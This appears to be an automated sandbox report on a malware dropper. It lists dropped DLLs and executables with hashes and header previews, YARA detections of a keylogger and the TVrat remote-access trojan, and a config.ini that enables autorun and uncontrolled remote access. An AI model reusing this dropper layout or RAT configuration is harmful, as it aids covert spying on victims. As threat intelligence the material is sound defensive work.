                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):713456
                                                                                                                                Entropy (8bit):6.620067101616198
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libssl-1_1.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\mk7r31.bmp (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x299, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8097
                                                                                                                                Entropy (8bit):7.94099711365173
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:E9NXj7fQ9/RRN0AinryQKGgjkrEQtxH1AYZ18r:E9NzjGkOujEQ3H1V8r
                                                                                                                                MD5:2302BC48A162783A6A41C278B3F54145
                                                                                                                                SHA1:8C3272769F604DC3AE6C6B98A29CC779532D1783
                                                                                                                                SHA-256:1E5F58772571897E96CCA5ACB597DF65F8775E64D7031D6B2CCDBF22D5181F51
                                                                                                                                SHA-512:465086DFF63176A864C0BC26BCCFA1FBBA0503F9AFD78A86C863C266469F54069D00BBB718440090A065EA92AD0DD42A67B6A6C99ED6B2378F6A721984A806A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......JFIF...................................................( ..&...!1!%)+.....383-7(-.+...........-! .--------------------------------------------------......+...."........................................@........................!1.A.."Qaq..2..#BR...3br........CS...s...............................(......................!.1.AQa".2Rq3...............?.........X..R|.[..X[q....9*$........Q.t.......E..Sv+9.[..a.......J..T..9@.F'..-...$..R.S.\...,.).T..+.T..My.S".]zt.....^.{.EXP.....i..z."].'..6G.H.kU.Q..W5..%i..F..n.{4 .n.m.B.O.h..#.=..$..|*...5..|'Z......e?...y>6Z...]....]`..Q.<..)..=....H..N..Z.~....O..qL...j.<.......EE......6Z/P>,....P..i.\..PK.W...5..o.........2.\.t./....j8.3/...|a-%.hx...v.}.Bw.Keck.{....c....G....Z..9o......h.m.Nj..."...j..:...T.n.*Ts........z...K.gl..?O:..F9. /./...,...>...........S.h...m.\..T....5R|..p......cO..g\M.?....3...JB.......4..$....|.[.Z...7...|j..H..r...Y.xcs.e.;...'..%h?..|fh..oV....j...y\gH.x8....'..8..Qe.G.^.c...^u.

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370488
                                                                                                                                Entropy (8bit):6.86993159214619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\quartz.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...Q..c...........!...I.p........... ... ..........................................ru....@.....................................................................V....................................................................................edata..............................@..@.code...9o... ...p.................. ..`.data...9............v..............@....rdata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\3bzcw9.cfg

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33
                                                                                                                                Entropy (8bit):4.9837880587523955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SqUEDm:Sqnm
                                                                                                                                MD5:71B4245ABD801E82ECC8CB1571F8F52E
                                                                                                                                SHA1:CD8ADA2E8089936C031937232E09E385FB402DDC
                                                                                                                                SHA-256:4BE589771AC3BE4AE5B94590AFC39AEA664FBF400C651FBD268B48436FA509A7
                                                                                                                                SHA-512:6897B6B819850489BF9732C46EDAFBDC8E439F3482E120A693D79FDBCB5F2E6947E7E2065D9A684F0A7CEF1B25E0938476D9F819F9F661A0D7AD2A7D0E8789D9
                                                                                                                                Malicious:false
                                                                                                                                Preview:..8..DXP+...1.GBY.*..E.JQB......

                                                                                                                                C:\Users\user\AppData\Roaming\im\AstCrp.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):172216
                                                                                                                                Entropy (8bit):6.698242571688099
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\ast.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7543992
                                                                                                                                Entropy (8bit):6.717610928993395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\astclient.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):581304
                                                                                                                                Entropy (8bit):6.580382227041057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\astrct.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1724088
                                                                                                                                Entropy (8bit):6.573221633911959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\aw_sas32.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17648
                                                                                                                                Entropy (8bit):6.317642988990049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\config.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):586
                                                                                                                                Entropy (8bit):5.203397968860563
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                                C:\Users\user\AppData\Roaming\im\hatls.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2236144
                                                                                                                                Entropy (8bit):5.624149670958732
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libcrypto-1_1.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libcryptoMD.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libcurl.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libeay32.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
